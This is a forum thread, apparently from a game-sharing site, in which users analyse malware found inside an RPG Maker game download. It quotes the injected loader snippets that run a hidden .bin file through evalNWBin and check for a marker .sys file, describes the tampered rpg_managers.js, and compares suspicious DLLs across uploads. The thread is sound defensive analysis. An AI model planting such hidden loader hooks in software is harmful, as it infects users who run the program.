So, I downloaded a game. Seijo Rinaria No Rakuyo. Nothing new.
After setting up, I opened it, and then it immediately closed. That was weird.
So I decided to go into the game files. Guess what. All the files in the data folder are just a variation of this.
I already had a bit of experience with this due to a dev who hid the encryption key of his game, so while curious, I wasn't alarmed. Though that dev only hid the System.json file.
When I entered the js folder, there was a weird .bin file there. I moved on and searched the .js files, and I got lucky. There were two interesting things there. Changed a few things on the code, just in case.
JavaScript:
if (typeof window._X === 'undefined') {
var p = require('path'); nw.Window.get().evalNWBin(null, p.join(process.cwd(), 'www', 'js', 'FILENAME.bin'));
}
JavaScript:
var fs = require('fs'), path = require('path'), FILENAME = 'obfuscated name of a .sys file on the same folder as Game.exe';
if (fs.existsSync(path.join(process.cwd(), FILENAME)) && typeof window.cDiv === 'undefined') {
//stuff;
}
I tried to comment the first one, and then the game just got stuck loading. I uncommented the code and removed the .bin file from the js folder, and then it threw an error.
So I went on to the second one. I managed to get the name of the .sys file it was trying to check for, but it wasn't there, so I made an empty .txt file, renamed it to the .sys one, and opened the game. The results are in the spoiler up there.
I had it opened from a different thing I was doing, so I got lucky detecting this. Can anyone check exactly what this is trying to do? Here's a download link for the maybe virus, and since it's from ryuugames.com, that's the password.
Seems like only the ryuu download is infected, I just downloaded one from two different sources (from the slow ones) and it's fine.
Ran fc on non-data files (.rpgmv and .json, since the ones from the other source don't have their .json files encrypted), and everything was the same (a few extra empty bits at the end of libEGL.dll and libGLESv2.dll though), except for the rpg_managers.js file. I'll just comment on the differences showing the original script.
JavaScript:
DataManager.loadDataFile = function(name, src) {
//virus code added a call to the .bin file
var xhr = new XMLHttpRequest();
var url = 'data/' + src;
xhr.open('GET', url);
xhr.overrideMimeType('application/json');
xhr.onload = function() {
if (xhr.status < 400) {
window[name] = JSON.parse(xhr.responseText);
DataManager.onLoad(window[name]);
//virus replaced the above two lines for a try catch, with everything following inside the try
//it checked for the .sys file to create a console thing
//after which it read the base64, did bitwise operations on it based on some function from the .bin file
//and finally it executed these two lines, the b variable is the base64 that was also modified
//window[name] = JSON.parse(b.toString('utf8').replace(/^\uFEFF/, ''));
//DataManager.onLoad(window[name]);
}
};
xhr.onerror = this._mapLoader || function() {
DataManager._errorUrl = DataManager._errorUrl || url;
};
//no idea why the virus also removed the above onerror function too
window[name] = null;
xhr.send();
};
Also, huh, a thread was made with the virus link, I think that should be changed, it has the corrupt script.
Some games containing the Miner issues that arose at the beginning of the year are still on this site, so please check if you are an uploader.
[RJ01522545] IDOL CONFLICT
I have reported the files I personally verified directly to the uploader, but I have not checked files uploaded by other uploaders.I suspect they are sharing files from the same source, so I would appreciate it if you could check.
Add:
The CRC values for libEGL.dll and libGLESv2.dll matched those of the trial version, confirming that the infection occurred after actually running the .exe file.
i compare Ryzen111 (left), Shine (middle), Otokonoko (right), and it seems the cryptbase.dll & d3dcompiler_64.dll was still on middle & right which i think was the virus dll before?
the only other difference is the resources.pak. the size on Shine & Otokonoko was 40753879 as for Ryzen111 was 5245483.
as for other i checked (ramori, nobodyknows22, UFO, Nihonjaki90) they all have cryptbase.dll too.
i compare Ryzen111 (left), Shine (middle), Otokonoko (right), and it seems the cryptbase.dll & d3dcompiler_64.dll was still on middle & right which i think was the virus dll before?
the only other difference is the resources.pak. the size on Shine & Otokonoko was 40753879 as for Ryzen111 was 5245483.
as for other i checked (ramori, nobodyknows22, UFO, Nihonjaki90) they all have cryptbase.dll too.
